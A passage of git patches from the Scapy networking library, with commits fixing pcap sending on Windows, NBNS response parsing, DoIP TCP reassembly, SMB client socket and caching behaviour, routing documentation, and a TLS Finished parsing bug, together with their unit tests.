type: (Packet) -> int - # Makes send detects when it should add - # Loopback(), Dot11... instead of Ether() + # Select the file descriptor to send the packet on. + iff = x.route()[0] + if iff is None: + iff = network_name(conf.iface) + if iff not in self.send_pcap_fds: + self.send_pcap_fds[iff] = fd = open_pcap( + device=iff, + snaplen=0, + promisc=False, + to_ms=0, + ) + else: + fd = self.send_pcap_fds[iff] + # Now send. sx = raw(self.cls() / x) try: x.sent_time = time.time() except AttributeError: pass - return self.pcap_fd.send(sx) + return fd.send(sx) + + def close(self): + # type: () -> None + if self.closed: + return + super(L3pcapSocket, self).close() + for fd in self.send_pcap_fds.values(): + if fd is not self.pcap_fd: + fd.close() diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 90922cba490..f4f74601849 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -746,7 +746,7 @@ def pcap_service_stop(askadmin=True): if conf.use_pcap: _orig_open_pcap = libpcap.open_pcap - def open_pcap(iface, # type: Union[str, NetworkInterface] + def open_pcap(device, # type: Union[str, NetworkInterface] *args, # type: Any **kargs # type: Any ): @@ -754,7 +754,7 @@ def open_pcap(iface, # type: Union[str, NetworkInterface] """open_pcap: Windows routine for creating a pcap from an interface. This function is also responsible for detecting monitor mode. """ - iface = cast(NetworkInterface_Win, resolve_iface(iface)) + iface = cast(NetworkInterface_Win, resolve_iface(device)) iface_network_name = iface.network_name if not iface: raise Scapy_Exception( diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index 8c9b88c677f..42bfa850921 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -398,6 +398,12 @@ class pcap_if(Structure): pcap_statustostr = _lib.pcap_statustostr pcap_statustostr.restype = STRING pcap_statustostr.argtypes = [c_int] + + # int pcap_set_buffer_size(pcap_t *p, int buffer_size) + # set the buffer size for a not-yet-activated capture handle + pcap_set_buffer_size = _lib.pcap_set_buffer_size + pcap_set_buffer_size.restype = c_int + pcap_set_buffer_size.argtypes = [POINTER(pcap_t), c_int] except AttributeError: pass From c33edf54887299519802d244dc847dabe0891cd9 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 4 Jun 2024 10:29:08 +0200 Subject: [PATCH 1291/1632] Fix minor parsing issue in NBNS query response (#4406) --- scapy/layers/netbios.py | 18 +++++++++++++----- test/scapy/layers/netbios.uts | 4 ++++ 2 files changed, 17 insertions(+), 5 deletions(-) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 718b23113f9..3a173e7d608 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -131,6 +131,7 @@ class NBNSHeader(Packet): ] # Name Query Request +# RFC1002 sect 4.2.12 class NBNSQueryRequest(Packet): @@ -152,6 +153,7 @@ def mysummary(self): # Name Query Response +# RFC1002 sect 4.2.13 class NBNS_ADD_ENTRY(Packet): @@ -187,11 +189,15 @@ def mysummary(self): ) -bind_layers(NBNSHeader, NBNSQueryResponse, +bind_layers(NBNSHeader, NBNSQueryResponse, # RD+AA OPCODE=0x0, NM_FLAGS=0x50, RESPONSE=1, ANCOUNT=1) +for _flg in [0x58, 0x70, 0x78]: + bind_bottom_up(NBNSHeader, NBNSQueryResponse, + OPCODE=0x0, NM_FLAGS=_flg, RESPONSE=1, ANCOUNT=1) -# Node Status Request +# Node Status Request +# RFC1002 sect 4.2.17 class NBNSNodeStatusRequest(NBNSQueryRequest): name = "NBNS status request" @@ -207,8 +213,9 @@ def mysummary(self): bind_bottom_up(NBNSHeader, NBNSNodeStatusRequest, OPCODE=0x0, NM_FLAGS=0, QDCOUNT=1) bind_layers(NBNSHeader, NBNSNodeStatusRequest, OPCODE=0x0, NM_FLAGS=1, QDCOUNT=1) -# Node Status Response +# Node Status Response +# RFC1002 sect 4.2.18 class NBNSNodeStatusResponseService(Packet): name = "NBNS Node Status Response Service" @@ -255,8 +262,9 @@ def answers(self, other): bind_layers(NBNSHeader, NBNSNodeStatusResponse, OPCODE=0x0, NM_FLAGS=0x40, RESPONSE=1, ANCOUNT=1) -# Name Registration Request +# Name Registration Request +# RFC1002 sect 4.2.2 class NBNSRegistrationRequest(Packet): name = "NBNS registration request" @@ -288,7 +296,7 @@ def mysummary(self): # Wait for Acknowledgement Response - +# RFC1002 sect 4.2.16 class NBNSWackResponse(Packet): name = "NBNS Wait for Acknowledgement Response" diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index 5c091b4e6a3..f79799152b6 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -35,6 +35,10 @@ assert pkt[NBNSQueryResponse].mysummary() == r"NBNSQueryResponse '\\FRED' is at z = NBNSQueryResponse(b' PPFCEFEECACACACACACACACACACACAAA\x00\x00 \x00\x01\x00\x04\x93\xe0\x00\x06\x00\x00\xc0\xa8\x00\r') assert z.mysummary() == r"NBNSQueryResponse '\\\xffRED' is at 192.168.0.13" +z = NBNSHeader(b'/S\x85\x80\x00\x00\x00\x01\x00\x00\x00\x00 FAEPFEEBFEEPCACACACACACACACACAAA\x00\x00 \x00\x01\x00\x03\xf4\x80\x00\x06\x00\x00\xc0\xa8\x01A') +assert z.RR_NAME == b'POTATO ' +assert z.ADDR_ENTRY[0].G == 0 +assert z.ADDR_ENTRY[0].NB_ADDRESS == "192.168.1.65" = NBNSNodeStatusResponse - build & dissect From b4bf3d62d5aa6f160a0768ca3ad598fb415f0994 Mon Sep 17 00:00:00 2001 From: Leonard Crestez Date: Tue, 4 Jun 2024 11:31:58 +0300 Subject: [PATCH 1292/1632] Use Sequence[Packet] in _PacketIterable instead of List (#4401) The Sequence type only requires a read-only list of Packet and is covariant. With List[Packet] the following simple code fails on mypy: pl = [Ether() / IP() / UDP() for _ in range(10)] wrpcap("tmp.pcap", pl) This happens because Packet.__div__ cleverly returns Self so pl is a List[Ether] which is incompatible with List[Packet]. We can't actually turn _PacketIterable into Iterable[Packet] because __len__ is used. --- scapy/plist.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/plist.py b/scapy/plist.py index daaccd3f419..0ea33d91f9d 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -10,7 +10,7 @@ import os from collections import defaultdict -from typing import NamedTuple +from typing import Sequence, NamedTuple from scapy.config import conf from scapy.base_classes import ( @@ -780,7 +780,7 @@ def sr(self, multi=False, lookahead=None): _PacketIterable = Union[ - List[Packet], + Sequence[Packet], Packet, SetGen[Packet], _PacketList[Packet] From d58090617b4045cc40394696b121debbd7a93145 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 8 Jun 2024 17:45:15 +0200 Subject: [PATCH 1293/1632] Add tcp_reassemble function to DoIP (#4409) --- scapy/contrib/automotive/doip.py | 9 +++++++++ test/contrib/automotive/doip.uts | 14 ++++++++++++++ 2 files changed, 23 insertions(+) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index f81049ca96e..1bc7b2cfe9b 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -38,6 +38,7 @@ Union, Tuple, Optional, + Dict, ) @@ -260,6 +261,14 @@ def extract_padding(self, s): else: return b"", None + @classmethod + def tcp_reassemble(cls, data, metadata, session): + # type: (bytes, Dict[str, Any], Dict[str, Any]) -> Optional[Packet] + length = struct.unpack("!I", data[4:8])[0] + 8 + if len(data) == length: + return DoIP(data) + return None + bind_bottom_up(UDP, DoIP, sport=13400) bind_bottom_up(UDP, DoIP, dport=13400) diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 3a2bb91c8cd..f3135928c62 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -381,6 +381,20 @@ assert req.hashret() == resp.hashret() assert resp[3].answers(req[3]) assert not req[3].answers(resp[3]) += TCPSession Test + +tmp_file = get_temp_file() + +wrpcap(tmp_file, [ + IP(src="10.10.10.10", dst="10.10.10.11") / TCP(sport=61000, seq=1) / DoIP(payload_type=0x8001, payload_length=6) / b"\x3E", + IP(src="10.10.10.10", dst="10.10.10.11") / TCP(sport=61000, dport=13400, seq=14) / Raw(load=b"\xff") +]) + +pkts = sniff(offline=tmp_file, session=TCPSession) +assert pkts[0].haslayer(UDS_TP) +assert pkts[0].service == 0x3E + + + DoIP Communication tests = Load libraries From 87fe04c51ebba2e622129f7c8c37db5e70a81c04 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 8 Jun 2024 18:39:08 +0200 Subject: [PATCH 1294/1632] Minor smbclient patches (#4413) --- .config/ci/zipapp.sh | 12 ++++++++---- scapy/layers/smb2.py | 1 + scapy/layers/smbclient.py | 30 +++++++++++++++++++++++++++--- 3 files changed, 36 insertions(+), 7 deletions(-) diff --git a/.config/ci/zipapp.sh b/.config/ci/zipapp.sh index af7b8018622..2459de212be 100755 --- a/.config/ci/zipapp.sh +++ b/.config/ci/zipapp.sh @@ -40,6 +40,7 @@ mkdir "$ARCH" mkdir "$SCPY" # Create git archive +echo "> Creating git archive..." git archive HEAD -o "$ARCH/scapy.tar.gz" # Unpack the archive to a temporary directory @@ -47,9 +48,11 @@ if [ ! -e "$ARCH/scapy.tar.gz" ]; then echo "ERROR: git archive failed" exit 1 fi -tar -xvf "$ARCH/scapy.tar.gz" -C "$SCPY" +echo "> Unpacking..." +tar -xf "$ARCH/scapy.tar.gz" -C "$SCPY" # Remove unnecessary files +echo "> Stripping down..." cd "$SCPY" && find . -not \( \ -wholename "./scapy*" -o \ -wholename "./pyproject.toml" -o \ @@ -59,7 +62,8 @@ cd $DIR # Depending on the mode, install dependencies and get DEST file if [ "$MODE" == "full" ]; then - $PYTHON -m pip install --target "$SCPY" IPython + echo "> Bundling dependencies..." + $PYTHON -m pip install --quiet --target "$SCPY" IPython DEST="./dist/scapy-full-$SCPY_VERSION.pyz" else DEST="./dist/scapy-$SCPY_VERSION.pyz" @@ -72,9 +76,8 @@ fi # Copy version echo "$SCPY_VERSION" > "./dist/version" -echo "$SCPY" # Build the zipapp -echo "Building zipapp" +echo "> Building zipapp..." $PYTHON -m zipapp \ -o "$DEST" \ -p "/usr/bin/env python3" \ @@ -86,3 +89,4 @@ $PYTHON -m zipapp \ rm -rf "$TMPFLD" echo "Success. zipapp avaiable at $DEST" +stat $DEST | head -n 2 diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 0d7d3ce1f38..5dbff1f28e7 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -108,6 +108,7 @@ 0xC0000033: "STATUS_OBJECT_NAME_INVALID", 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", 0xC0000043: "STATUS_SHARING_VIOLATION", + 0xC0000061: "STATUS_PRIVILEGE_NOT_HELD", 0xC000006D: "STATUS_LOGON_FAILURE", 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", 0xC0000071: "STATUS_PASSWORD_EXPIRED", diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 01553a7a9c9..5acfe556f78 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1137,6 +1137,15 @@ def __init__( ssp = None # Open socket sock = socket.socket(family, socket.SOCK_STREAM) + # Configure socket for SMB: + # - TCP KEEPALIVE, TCP_KEEPIDLE and TCP_KEEPINTVL. Against a Windows server this + # isn't necessary, but samba kills the socket VERY fast otherwise. + # - set TCP_NODELAY to disable Nagle's algorithm (we're streaming data) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 10) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 10) + # Timeout & connect sock.settimeout(timeout) sock.connect((target, port)) self.extra_create_options = [] @@ -1193,6 +1202,7 @@ def __init__( self.localpwd = pathlib.Path(".").resolve() self.current_tree = None self.ls_cache = {} # cache the listing of the current directory + self.sh_cache = [] # cache the shares # Start CLI if cli: self.loop(debug=debug) @@ -1226,6 +1236,9 @@ def shares(self): """ List the shares available """ + # Poll cache + if self.sh_cache: + return self.sh_cache # One of the 'hardest' considering it's an RPC self.rpcclient.open_smbpipe("srvsvc") self.rpcclient.bind(find_dcerpc_interface("srvsvc")) @@ -1253,6 +1266,7 @@ def shares(self): share.valueof("shi1_remark").decode(), ) ) + self.sh_cache = results # cache return results @CLIUtil.addoutput(shares) @@ -1271,6 +1285,15 @@ def use(self, share): self.pwd = pathlib.PureWindowsPath("/") self.ls_cache.clear() + @CLIUtil.addcomplete(use) + def use_complete(self, share): + """ + Auto-complete 'use' + """ + return [ + x[0] for x in self.shares() if x[0].startswith(share) and x[0] != "IPC$" + ] + def _parsepath(self, arg, remote=True): """ Parse a path. Returns the parent folder and file name @@ -1282,7 +1305,7 @@ def _parsepath(self, arg, remote=True): if arg.endswith("/") or arg.endswith("\\"): eltpar = elt eltname = "" - elif elt.parent and elt.parent.name: + elif elt.parent and elt.parent.name or elt.is_absolute(): eltpar = elt.parent return eltpar, eltname @@ -1426,8 +1449,9 @@ def _lfs_complete(self, arg, cond): eltpar, eltname = self._parsepath(arg, remote=False) eltpar = self.localpwd / eltpar return [ - str(x.relative_to(self.localpwd)) - for x in eltpar.glob("*") + # trickery so that ../ works + str(eltpar / x.name) + for x in eltpar.resolve().glob("*") if (x.name.lower().startswith(eltname.lower()) and cond(x)) ] From aff2b9852dcfdd7078c5b5dfcac757f80f3f128c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 8 Jun 2024 18:52:34 +0200 Subject: [PATCH 1295/1632] conf.route: improve doc (#4399) * conf.route: improve doc * Apply guedou suggestion Co-authored-by: Guillaume Valadon --------- Co-authored-by: Guillaume Valadon --- doc/scapy/routing.rst | 13 ++++++++++--- scapy/route.py | 42 +++++++++++++++++++++++++++++++----------- 2 files changed, 41 insertions(+), 14 deletions(-) diff --git a/doc/scapy/routing.rst b/doc/scapy/routing.rst index 883259622da..2f9a9ec8010 100644 --- a/doc/scapy/routing.rst +++ b/doc/scapy/routing.rst @@ -74,6 +74,12 @@ Here's an example of how to use `sshdump >> conf.ifaces.dev_from_networkname("sshdump").get_extcap_config() + .. todo:: The sections below can be greatly improved. IPv4 routes @@ -138,10 +144,11 @@ Get the MAC of an interface >>> mac '54:3f:19:c9:38:6d' -Get MAC by IP -------------- +Get MAC address of the next hop to reach an IP +---------------------------------------------- -This basically performs a cached ARP who-has. +This basically performs a cached ARP who-has when the IP is on the same local link, +returns the MAC of the gateway when it's not, and handle special cases like multicast. .. code-block:: pycon diff --git a/scapy/route.py b/scapy/route.py index f01d351fb8f..af1411aa329 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -69,7 +69,6 @@ def make_route(self, metric=1, # type: int ): # type: (...) -> Tuple[int, int, str, str, str, int] - from scapy.arch import get_if_addr if host is not None: thenet, msk = host, 32 elif net is not None: @@ -86,20 +85,41 @@ def make_route(self, nhop = thenet dev, ifaddr, _ = self.route(nhop) else: - ifaddr = get_if_addr(dev) + ifaddr = "0.0.0.0" # acts as a 'via' in `ip addr add` return (atol(thenet), itom(msk), gw, dev, ifaddr, metric) def add(self, *args, **kargs): # type: (*Any, **Any) -> None - """Ex: - add(net="192.168.1.0/24",gw="1.2.3.4") + """Add a route to Scapy's IPv4 routing table. + add(host|net, gw|dev) + + :param host: single IP to consider (/32) + :param net: range to consider + :param gw: gateway + :param dev: force the interface to use + :param metric: route metric + + Examples: + + - `ip route add 192.168.1.0/24 via 192.168.0.254`:: + >>> conf.route.add(net="192.168.1.0/24", gw="192.168.0.254") + + - `ip route add 192.168.1.0/24 dev eth0`:: + >>> conf.route.add(net="192.168.1.0/24", dev="eth0") + + - `ip route add 192.168.1.0/24 via 192.168.0.254 metric 1`:: + >>> conf.route.add(net="192.168.1.0/24", gw="192.168.0.254", metric=1) """ self.invalidate_cache() self.routes.append(self.make_route(*args, **kargs)) def delt(self, *args, **kargs): # type: (*Any, **Any) -> None - """delt(host|net, gw|dev)""" + """Remove a route from Scapy's IPv4 routing table. + delt(host|net, gw|dev) + + Same syntax as add() + """ self.invalidate_cache() route = self.make_route(*args, **kargs) try: @@ -148,13 +168,13 @@ def ifadd(self, iff, addr): def route(self, dst=None, verbose=conf.verb, _internal=False): # type: (Optional[str], int, bool) -> Tuple[str, str, str] """Returns the IPv4 routes to a host. - parameters: - - dst: the IPv4 of the destination host - returns: (iface, output_ip, gateway_ip) - - iface: the interface used to connect to the host - - output_ip: the outgoing IP that will be used - - gateway_ip: the gateway IP that will be used + :param dst: the IPv4 of the destination host + + :returns: tuple (iface, output_ip, gateway_ip) where + - ``iface``: the interface used to connect to the host + - ``output_ip``: the outgoing IP that will be used + - ``gateway_ip``: the gateway IP that will be used """ dst = dst or "0.0.0.0" # Enable route(None) to return default route if isinstance(dst, bytes): From 6b26acebc177cc439c3df682ba3400414f1ae677 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 11 Jun 2024 10:33:05 +0200 Subject: [PATCH 1296/1632] Fix issue 4418 (#4419) --- scapy/layers/tls/handshake.py | 2 +- test/scapy/layers/tls/tls.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index d60fdb2ffbc..f2073a9c6bb 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1370,7 +1370,7 @@ class _VerifyDataField(StrLenField): def getfield(self, pkt, s): if pkt.tls_session.tls_version == 0x0300: sep = 36 - elif pkt.tls_session.tls_version >= 0x0304: + elif pkt.tls_session.tls_version and pkt.tls_session.tls_version >= 0x0304: sep = pkt.tls_session.rcs.hash.hash_len else: sep = 12 diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index 029ac100ce3..b88a3cb4cfd 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -1549,6 +1549,11 @@ tls_packet = TLS(msg=[TLSClientHello(ext=[TLS_Ext_KeyShare_CH(client_shares=[Key tls_packet.raw_stateful() assert tls_packet.tls_session.tls13_client_privshares['ffdhe4096'].key_size == 4096 += Issue 4418 - TLSFinished + +tls_packet = TLSFinished(bytes.fromhex('1400000c72793a9d2f946a0455bf1995')) +assert tls_packet.vdata == b'ry:\x9d/\x94j\x04U\xbf\x19\x95' + = OCSP: payload after OCSP - GH3291 data = b'1603031616020000660303602161b58e22f4966f18f9aa6afd5759f343935ed437cf09c554dd27691a1eb420a13c0000eaad0a6cd4f11bfc59788daec98422be4f3810c19669207e509aaa11c03000001e000500000023000000100005000302683200170000ff01000100000000000b000d5d000d5a0007f6308207f2308205daa00302010202136b000006c55514d0a6c4891be20000000006c5300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3230303930393231343530355a170d3231303930393231343530355a30223120301e060355040313177074692e73746f72652e6d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a028201010094876b9572b7c3d7fbb2d569ffff6b8f716245a2d9b413c9e8238ee88d98b1002cec8c2198b52f3b7f0a679ceb1aeb2c1467d2eda3c71b4bb0756ba42354a956b8d40bd422921793b3dec0aab3f5e0b023bcb7dfdf48bd4b064c1a62255e9b58c16ad482087fd1505b01aad9474f06925f3821fbe92f680e87db3f0aa150e2066848f88ebe08d8280185bbba697b39d12e03eae6d4e481319432f2752793fcd125f2714cd92b37e3d9b8fcec7fd7b3c121fdedc42b50ff65f73352cbc1202ac59c846df2a9168c00fc4754f5e19c3b0503dbe4f58b0f8b3e0fa411d4dcb8e1acdef9a2ca7db52e282a14119e1ef3a867a3b7d8fdaccc27d3d2033bb5082a1b510203010001a38203f2308203ee30820105060a2b06010401d6790204020481f60481f300f10076007d3ef2f88fff88556824c2c0ca9e5289792bc50e78097f2e6a9768997e22f0d70000017474dd866500000403004730450221008886de3960d7fe8cbaa9bcf91f961d920af99ec72adaf07fb6f6e2759d6d045b02201f90de8ad6dc333cbf920fe6cd66b41d97a01397831b2ea39f618c1505ecc7e70077004494652eb0eeceafc44007d8a8fe28c0dae682bed8cb31b53fd33396b5b681a80000017474dd86d200000403004830460221008f66e7ce568540722b5a09d96bc08d78a1cc98dda6c7c2cda1daaa7ea49d75f302210099ccca061b9b31f938988f2e4182fcb39035f6e90d5dee8c928582bd4e5fb693302706092b060104018237150a041a3018300a06082b06010505070301300a06082b06010505070302303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d85868e4187c2985002016402012530818706082b06010505070101047b3079305306082b060105050730028647687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f4d6963726f736f6674253230525341253230544c53253230434125323030312e637274302206082b060105050730018616687474703a2f2f6f6373702e6d736f6373702e636f6d301d0603551d0e041604142746d09d123c3c91382ef590e0aab2a901f0d0c3300b0603551d0f0404030204b030780603551d110471306f821b7074692d696e742e73746f72652e6d6963726f736f66742e636f6d82177074692e73746f72652e6d6963726f736f66742e636f6d821a7074692d696e742e747261666669636d616e616765722e6e6574821b7074692d70726f642e747261666669636d616e616765722e6e65743081b00603551d1f0481a83081a53081a2a0819fa0819c864d687474703a2f2f6d7363726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c864b687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c30570603551d200450304e304206092b0601040182372a013035303306082b060105050702011627687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f6370733008060667810c010201301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64301d0603551d250416301406082b0601050507030106082b06010505070302300d06092a864886f70d01010b0500038202010086dd00ab90b01c8f5c87d59c2cc45e2cb81998699e5e97aeceea13670bbf2b76e9add7cd11bc4ef347dbab7ea7c28300223bd43e5d2904db1516c55572181534f4efc11eccf4d10a9c08ddfbff53cad870856e0e3377b7639cfc3de5d3c7ca8294cc6e7ac0cac0e1a3cd4b0b81cdcb2fa1dbf6ebc2659d6f1947e8047be27c02fba8b6a991837781cea269246353e5441aa33c8494d4591ee482f448bef23460578f96c5c1e92f5a7cd7c81815b40a7cc00aeee6976a708c1d236c7fe64a4a45f7fd83707c0e621ff7e78fe089dd3ff539148a0acba6a99a8ca630ef2e2c83529596bbb3fb1c9ea7f371158d70b36120217154003e791db16390877c83dd27543c15e73c1af5f22b4c7c73347a9b97de633abdd9413363877a8a428f18cd624e310e2ea17aa4740a167aabecfb5f5c244ef8ada6638f90592df625885b9a57ec478acca5ec2c35e6c66b597be4570057d6769f3e5c2487ea70f84ecabc0f4064bb0e7be746d652f3861b931eb0e75846253e7eeae987cf7d4193bd1dc85044ee798d821536944c7ade7e269b13e4ece47093c641e7fc8d31dc0e3d211d94e8b450cfed2733ad78fac2eae225acd505117c39243a8e24feebd47ff875643d1ef777dd2a1a18f370dd83fdf85ca2eadf3c46711aedc68fc13b1db8bf71e015c77f69882613ea096c216e759553ea475a48db8ac4e92b8b184b7dbc9d458758e85200055e3082055a30820442a00302010202100f14965f202069994fd5c7ac788941e2300d06092a864886f70d01010b0500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3230303732313233303030305a170d3234313030383037303030305a304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c5320434120303130820222300d06092a864886f70d01010105000382020f003082020a0282020100aa6277cf9a63b20684f39036f499f31451abea950a3b4606fd11411ffe5b0658c9386e08fc4f4448cd3aa4f7bd1ea2e295b8be5120c5bfb270635d780c43c029cd64490996daafcefd055f2b2a91e8016e2e189b2c9cd0017f69f5ee3f53885cba056cbe2215671482f22cd2be5b6337ccaf6085e8966b6b8008a86ebe009c6b9570fce41812b11d1bb2c11331673334e625c9625b58827576f2fef23f3b16dfaa4283e3326d9b8e4326f0bd0e1fa1a73aaf2cc88ae6ea3ff9a5d2258f92aa1a08129cfeac4ac7c3eb8094ab8716d12349e7a4bbc791dfe679343f414aa73a26d2ea6f46e33873e6e5d491ae0b789e78a5ef96e373d8f79565e905bf4f5cff52a7f9cf08afa74d0999c071a3527aa53bd79b015403e3b662b05a279c30268eb64d56a117177a7b95a107ac5331b6d62e0fcd4174ecf101b2fd45bffc31e146423136431eb9aa055f847f91b18bae0fd754c3fdf064086ad39c8eea7934ec033d73e01b36d46811c75970b0877cc0dc6e45ca36ce43267702a9700de8b857544442c3fbac1b632608c2d2231f7f930b7c6f08549a2b4e5dce9fa53ed2985bd102dbf183ce3052483863f1b1fbed23d33e92b5278dd04273d79d236871ba595e0752a6964dbf7c4e6f742205c0538016d8604e97314f894e4863d8edf9e5c2d90eb20bf6694cbd4b01c9cbdd06bf3a02eb1cdd308b0d4a1460f9d5644f4344a1ed0203010001a382012530820121301d0603551d0e04160414b5760c3011cec792424d4cc75c2cc8a90ce80b64301f0603551d23041830168014e59d5930824758ccacfa085436867b3ab5044df0300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d303a0603551d1f04333031302fa02da02b8629687474703a2f2f63726c332e64696769636572742e636f6d2f4f6d6e69726f6f74323032352e63726c302a0603551d20042330213008060667810c0102013008060667810c010202300b06092b0601040182372a01300d06092a864886f70d01010b050003820101009f2bbe92675bda7b8aade8ff9d4d050eedb60d1541d1e615dc0360f9f422569c48f99daeda2b3ca8c0abd0ba95b8c8c1fd7c6371b6c87a889b3046a38e7d9602e3f82204efe036c06fc2bf2e0d6eedd676280d81873e9be7a7108cda661f4051eae7bebf4e6798bb5459636f42e30f31601964000f260c97d184c0a67a193b70de4526dc96463d9c663fe13a8238e53603042857a4e94b64a218886d60898d7abe10918bace63f3130bfeb64d79e8de9c192566e388d343faecd6c6b4252623cd46989e0a057590b839fc6722442f5080384ce1663f334f105763719b206de133e137061d304f2b8476f05e38a88302b47455e7954c5f9ddebfa3f785175d25b160006d6010006d2308206ce0a0100a08206c7308206c306092b0601050507300101048206b4308206b03081a5a21604149a0190a5b9942f43bc62113fcd3d404bead25250180f32303231303230383036303930325a307a3078304c300906052b0e03021a05000414521ee36c478119a9cb03fab74e57e1197af1818b0414b5760c3011cec792424d4cc75c2cc8a90ce80b6402136b000006c55514d0a6c4891be20000000006c58000180f32303231303230383036303930325aa011180f32303231303231323036303930325aa1023000300d06092a864886f70d01010b05000382010100784c3cee7765bf5cb164c0cf465462c37e97d11041443dcd9052e413747a71f8c37a051a29cdba11ea15cac3c252eeab533c7e9141431649a3a57a7dacc1fa697fdd360c139a35af181b7154574e7b87ade8da951d1894362082f80eb56d3775e729e930a097e72a7339e6e63719acc8166fd9c77c068cc75240a3b2149da8bcc24187addcfcc7330ad057b1d7a215380ea8e060b2a85330bc262c58e119672d846b87be7edf535d68a4bc2a643516df1c134401d96f0944d4d7ebe7a769ecdcfa90418486c9d62a9a4c46e232fa94221392f59a9c8df520b19e1214ed4ac70f54367b640924c48d2d3596056ff7424fc1734b98edc02dc67d8d72f6d10f44e8a08204f0308204ec308204e8308202d0a00302010202136b00086694d48d4b29943630f5000000086694300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3231303230323139353831335a170d3232303230323139353831335a30353133303106035504030c2a4d6963726f736f66745f5253415f544c535f49737375696e675f43415f30315f4b657942696e64696e6730820122300d06092a864886f70d01010105000382010f003082010a0282010100b65a936febea1694e5de2b8dfc1997d265f3582b94f9be1fb56bb96e2191c5df170bb52d276c30c8fdc876f1e5b3d9b900571e17fd505534f56db0ab7953261a34911e9fb0340aac76c1baede9a580ee86eba49f0e3d7cddcc60d973c69afc157aaa5d2d6ede3cd7d9a265098ee932fde13049e0f1490b2bb88bd56b6e26033ad99f49f6b7366eb275e6550c6b74f1823ac6dcf86a843825ade03f670a7ce895c840a7cfca247bc94d608ee30feefa8346470bc69f0f2e847b5896b377d70fa20e99d3af06b2d8c286b512fad8070cdc33f3302f48ad02014a21de13d1a04fbdf6fca54cc7364e303a1b458d2093fb8e98f686c2d8da374e757f8ac25b2210e70203010001a381d63081d3301d0603551d0e041604149a0190a5b9942f43bc62113fcd3d404bead25250300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070309300f06092b060105050730010504020500301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d81cc9b4781c8e916020164020107301b06092b060104018237150a040e300c300a06082b06010505070309300d06092a864886f70d01010b0500038202010012d83b821ff2afc4d67c63cee2d9a1045c1a1f0628274e1da3ef03fcdc720d420423478090afe6cbbaf4c753fdcad04aef5ca919c96ab9b540a64cc23d24181e7016391e780ae56a0897a372ea9a93a959c0d713ae0cbd5e6ca420724a110ac0901d671ea8c57ba31db062a7df4bbc8cb78d820262f9ba12e4313edb85155f69c47a05fa6171958e6577